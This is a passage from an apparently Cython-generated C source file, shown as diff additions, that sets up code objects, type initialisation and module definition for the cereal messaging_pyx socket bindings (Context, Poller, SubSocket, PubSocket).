CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__36)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__37 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__37)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":186 + * self.socket = ptr + * + * def connect(self, Context context, string endpoint, string address=b"127.0.0.1", bool conflate=False): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint, address, conflate) + * + */ + __pyx_tuple__38 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_context, __pyx_n_s_endpoint, __pyx_n_s_address, __pyx_n_s_conflate, __pyx_n_s_r); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + __pyx_codeobj__39 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__38, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_connect, 186, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__39)) __PYX_ERR(0, 186, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":195 + * raise MessagingError(endpoint) + * + * def setTimeout(self, int timeout): # <<<<<<<<<<<<<< + * self.socket.setTimeout(timeout) + * + */ + __pyx_codeobj__40 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_setTimeout, 195, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__40)) __PYX_ERR(0, 195, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":198 + * self.socket.setTimeout(timeout) + * + * def receive(self, bool non_blocking=False): # <<<<<<<<<<<<<< + * msg = self.socket.receive(non_blocking) + * + */ + __pyx_tuple__41 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_non_blocking, __pyx_n_s_msg, __pyx_n_s_sz, __pyx_n_s_m); if (unlikely(!__pyx_tuple__41)) __PYX_ERR(0, 198, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__41); + __Pyx_GIVEREF(__pyx_tuple__41); + __pyx_codeobj__42 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_receive, 198, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__42)) __PYX_ERR(0, 198, __pyx_L1_error) + __pyx_tuple__43 = PyTuple_Pack(1, Py_False); if (unlikely(!__pyx_tuple__43)) __PYX_ERR(0, 198, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__43); + __Pyx_GIVEREF(__pyx_tuple__43); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__44 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__44)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__45 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__45)) __PYX_ERR(1, 3, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":227 + * del self.socket + * + * def connect(self, Context context, string endpoint): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint) + * + */ + __pyx_tuple__46 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_context, __pyx_n_s_endpoint, __pyx_n_s_r); if (unlikely(!__pyx_tuple__46)) __PYX_ERR(0, 227, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__46); + __Pyx_GIVEREF(__pyx_tuple__46); + __pyx_codeobj__47 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__46, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_connect, 227, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__47)) __PYX_ERR(0, 227, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":236 + * raise MessagingError(endpoint) + * + * def send(self, bytes data): # <<<<<<<<<<<<<< + * length = len(data) + * r = self.socket.send(data, length) + */ + __pyx_tuple__48 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_data, __pyx_n_s_length, __pyx_n_s_r); if (unlikely(!__pyx_tuple__48)) __PYX_ERR(0, 236, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__48); + __Pyx_GIVEREF(__pyx_tuple__48); + __pyx_codeobj__49 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__48, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_send, 236, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__49)) __PYX_ERR(0, 236, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":246 + * raise MessagingError + * + * def all_readers_updated(self): # <<<<<<<<<<<<<< + * return self.socket.all_readers_updated() + */ + __pyx_codeobj__50 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_messaging_messaging_pyx_p, __pyx_n_s_all_readers_updated, 246, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__50)) __PYX_ERR(0, 246, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__51 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__51)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__52 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__52)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + __pyx_vtabptr_6cereal_9messaging_13messaging_pyx_Event = &__pyx_vtable_6cereal_9messaging_13messaging_pyx_Event; + __pyx_vtable_6cereal_9messaging_13messaging_pyx_Event.setEvent = (PyObject *(*)(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *, Event))__pyx_f_6cereal_9messaging_13messaging_pyx_5Event_setEvent; + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9messaging_13messaging_pyx_Event_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event)) __PYX_ERR(0, 55, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9messaging_13messaging_pyx_Event_spec, __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event = &__pyx_type_6cereal_9messaging_13messaging_pyx_Event; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_dictoffset && __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event, __pyx_vtabptr_6cereal_9messaging_13messaging_pyx_Event) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_Event, (PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle)) __PYX_ERR(0, 85, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle_spec, __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle) < 0) __PYX_ERR(0, 85, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle = &__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle) < 0) __PYX_ERR(0, 85, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle->tp_dictoffset && __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_SocketEventHandle, (PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle) < 0) __PYX_ERR(0, 85, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle) < 0) __PYX_ERR(0, 85, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9messaging_13messaging_pyx_Context_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context)) __PYX_ERR(0, 117, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9messaging_13messaging_pyx_Context_spec, __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context) < 0) __PYX_ERR(0, 117, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context = &__pyx_type_6cereal_9messaging_13messaging_pyx_Context; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context) < 0) __PYX_ERR(0, 117, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context->tp_dictoffset && __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_Context, (PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context) < 0) __PYX_ERR(0, 117, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context) < 0) __PYX_ERR(0, 117, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9messaging_13messaging_pyx_Poller_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller)) __PYX_ERR(0, 134, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9messaging_13messaging_pyx_Poller_spec, __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller) < 0) __PYX_ERR(0, 134, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller = &__pyx_type_6cereal_9messaging_13messaging_pyx_Poller; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller) < 0) __PYX_ERR(0, 134, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller->tp_dictoffset && __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_Poller, (PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller) < 0) __PYX_ERR(0, 134, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller) < 0) __PYX_ERR(0, 134, __pyx_L1_error) + #endif + __pyx_vtabptr_6cereal_9messaging_13messaging_pyx_SubSocket = &__pyx_vtable_6cereal_9messaging_13messaging_pyx_SubSocket; + __pyx_vtable_6cereal_9messaging_13messaging_pyx_SubSocket.setPtr = (PyObject *(*)(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *, SubSocket *))__pyx_f_6cereal_9messaging_13messaging_pyx_9SubSocket_setPtr; + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket)) __PYX_ERR(0, 164, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket_spec, __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket) < 0) __PYX_ERR(0, 164, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket = &__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket) < 0) __PYX_ERR(0, 164, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_dictoffset && __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket, __pyx_vtabptr_6cereal_9messaging_13messaging_pyx_SubSocket) < 0) __PYX_ERR(0, 164, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket) < 0) __PYX_ERR(0, 164, __pyx_L1_error) + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_SubSocket, (PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket) < 0) __PYX_ERR(0, 164, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket) < 0) __PYX_ERR(0, 164, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket)) __PYX_ERR(0, 216, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket_spec, __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket) < 0) __PYX_ERR(0, 216, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket = &__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket) < 0) __PYX_ERR(0, 216, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_dictoffset && __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_PubSocket, (PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket) < 0) __PYX_ERR(0, 216, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket) < 0) __PYX_ERR(0, 216, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_messaging_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_messaging_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "messaging_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initmessaging_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initmessaging_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_messaging_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_messaging_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + 